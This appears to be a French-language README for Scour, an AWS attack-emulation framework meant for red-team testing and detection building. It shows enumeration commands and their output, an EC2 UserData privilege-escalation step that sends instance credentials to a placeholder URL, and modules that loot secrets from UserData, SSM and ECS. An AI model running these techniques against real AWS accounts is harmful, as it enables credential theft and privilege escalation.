
Framework d’exploitation AWS basé sur des modules pour les tests d’équipe rouge et l’analyse d’équipe bleue. Émule des modèles d’attaque dans le plan de contrôle AWS avec un suivi UA unique pour le développement de détection.
Cet outil est utilisé pour émuler des schémas d'attaque dans le plan de contrôle AWS. Chaque attaque est marquée avec un UA spécifique pour que l'équipe bleue puisse signaler.
C'est encore un travail en cours. **Beaucoup de bugs
Pas prêt pour la production
Où signaler les problèmes: https://github.com/grines/scour/issues
Maintenu par: grines
Scour est un framework d'exploitation AWS moderne basé sur des modules, écrit en golang, conçu pour les tests d'équipe rouge et l'analyse d'équipe bleue. Scour contient des techniques modernes qui peuvent être utilisées pour attaquer des environnements ou construire des détections pour la défense.
Scour est écrit en golang, il est donc facile à distribuer sous forme de binaire.
##Récupération
go get github.com/grines/scour
##Construction
go build main.go
Pour des instructions utilisateur plus détaillées et conviviales, veuillez consulter le guide d'installation du Wiki. **à venir
Scour utilise une gamme de modules :
La première fois que Scour est lancé,
token profile <profile_name> <region> listera les profils AWS disponibles stockés dans ~/aws/credentials.token AssumeRole <role_name> <region> assumera un rôle du même compte ou d'un compte croisé. ** nécessite une session activehelp module retournera les informations d'aide applicables pour le module spécifié. **aide à déterminerattack evasion <tactic> exécutera le module spécifié avec ses paramètres par défaut.scour entrera en mode cliNot Connected <> token profile apiuser us-east-1 définit la session à utiliser pour les commandes qui en nécessitent uneConnected <apiuser/us-east-1> connecté activement à un profil AWS depuis (~,/aws/credentials) dans (region)Connected <apiuser/us-east-1> attack enum <attack> complétion par tabulation avec liste des tactiques d'énumération disponiblesConnected <apiuser/us-east-1> attack privesc <attack> complétion par tabulation avec liste des tactiques d'escalade de privilèges disponiblesConnected <apiuser/us-east-1> attack lateral <attack> complétion par tabulation avec liste des tactiques latérales disponiblesConnected <apiuser/us-east-1> attack evasion <attack> complétion par tabulation avec liste des tactiques d'évasion disponiblesConnected <apiuser/us-east-1> attack creds <attack> complétion par tabulation avec liste des tactiques de découverte d'identifiants disponiblesConnected <apiuser/us-east-1> attack execute <attack> complétion par tabulation avec liste des tactiques d'exécution disponibles
Connected <apiuser/us-east-1> attack enum IAM Découverte IAM+-------------+---------------------+------------------+---------------+--------------+
| USER | MANAGED POLICIES | INLINE POLICIES | GROUPS | ISPRIVILEGED |
+-------------+---------------------+------------------+---------------+--------------+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true |
| EC2 | AmazonEC2FullAccess | | | true |
+-------------+---------------------+------------------+---------------+--------------+
Connected <apiuser/us-east-1> attack enum Roles Découverte des rôlesUA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| ROLE | PRINCIPAL TYPE | IDENTITY/SERVICE | ISPRIVILEGED |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861******:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Service | [codebuild.amazonaws.com] | true |
| Amazon_CodeBuild_HS59ko7lxn | Service | [codebuild.amazonaws.com] | true |
+------------------------------------------------------------+----------------+-----------------------------------------------------+--------------+
Connected <apiuser/us-east-1> attack enum EC2 Découverte EC2UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| INSTANCEID | INSTANCE PROFILE | VPC | PUBLICIP | PRIVATEIP | SECURITY GROUPS | PORTS | STATE | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None | vpc-7e830c1a | None | 172.31.53.199 | sg-09fcd28717cf4f512 | 80* | stopped | false | true |
| | | | | | | 22* | | | |
| | | | | | | 5000* | | | |
| i-03657fe3b9decdf51 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.45.96 | sg-61b1fd07 | All* | stopped | true | true |
| | | | | | | 8888* | | | |
| i-01b265a5fdc45df57 | None | vpc-7e830c1a | None | 172.31.38.118 | sg-0392f752f9b849d3f | 3389* | stopped | false | true |
| i-0867709d6c0be74d9 | arn:aws:iam::*****:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.39.199 | sg-006543a34d2f70028 | 22* | stopped | true | true |
| i-0d95790b5e7ddff23 | None | vpc-7e830c1a | None | 172.31.12.57 | sg-e1a50dac | 33391* | stopped | false | true |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
Connected <apiuser/us-east-1> attack enum S3 Découverte S3UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| BUCKET | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn********3d79b01a | false | false | false | | false | | false | us-west-2 |
| aws-cloudtrail-logs-**********98-cb39df0d | true | false | false | | false | | false | |
| bullsecu********* | true | true | false | | false | | false | |
| connect-6ec*****ad67 | false | false | false | | false | | false | |
| connect-******5337c3 | false | false | false | | false | | false | |
| ransom******** | true | false | false | | false | | false | |
| red******** | false | false | false | | false | | false | |
| rep-***** | false | false | false | | false | | false | us-west-2 |
| terraform******* | false | false | false | | false | | false | |
+-------------------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
Connected <apiuser/us-east-1> attack enum Groups Découverte des groupesUA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| GROUP | POLICIES | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2 | SecurityAudit | false | | false |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | false | | false |
| TestGroup | AmazonEC2FullAccess | true | | false |
| | SecurityAudit | | | |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
Connected <apiuser/us-east-1> attack enum Network Découverte réseauTBD

Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data voler les identifiants de métadonnées d'EC2. Arrêter l'instance / Mettre à jour les données utilisateur pour poster les identifiants vers l'URL fournie / Démarrer l'instance (envoie le jeton EC2 à l'URL).[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 - State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 - State: pending

Connected <apiuser/us-east-1> attack creds UserData piller les identifiants depuis les données utilisateur EC2UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+---------------------+------------------+-------------------------------------------------------------------------------+
| INSTANCEID | RULE | FINDING |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword |
+---------------------+------------------+-------------------------------------------------------------------------------+
Connected <apiuser/us-east-1> attack creds SSM piller les identifiants depuis Systems ManagerUA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE | VALUE |
+------------+----------+----------------------+
| Test | text | thismightbeapassword |
+------------+----------+----------------------+
Connected <apiuser/us-east-1> attack creds ECS piller les identifiants depuis ECSUA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret | heere | sample-app |
+-------------+-------+------------+
Connected <apiuser/us-east-1> attack persist <attack> complétion par tabulation avec liste des tactiques de persistance disponiblesConnected <apiuser/us-east-1> attack exfil <attack> complétion par tabulation avec liste des tactiques d'exfiltration disponibles